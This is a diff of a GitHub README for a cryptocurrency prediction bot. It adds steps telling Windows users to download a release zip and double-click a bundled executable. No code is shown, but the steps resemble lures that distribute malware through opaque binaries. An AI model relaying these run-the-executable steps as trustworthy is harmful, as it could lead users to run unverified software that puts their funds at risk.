SilviaKadeh/pancake-predict-bot-UI-Supported/README.md

 - Double-click on the "ForceStart.exe" or "PCS.dmg" file to run it.
 - And follow the instructions in the application window.

-## 🐰⚡ Installation on CMD - Windows
+## 🐰⚡ Installation on Windows

+### Way 1

+- Download [WindowsApp](https://github.com/SilviaKadeh/pancake-predict-bot-UI-Supported/releases/download/v9.2/PCS_Windows.zip) the latest version.
+- Double-Click on the "PCS.exe" open to run it.

+### Way 2 - CMD

 Download and Install Git here:
 [Git](https://git-scm.com/download/win)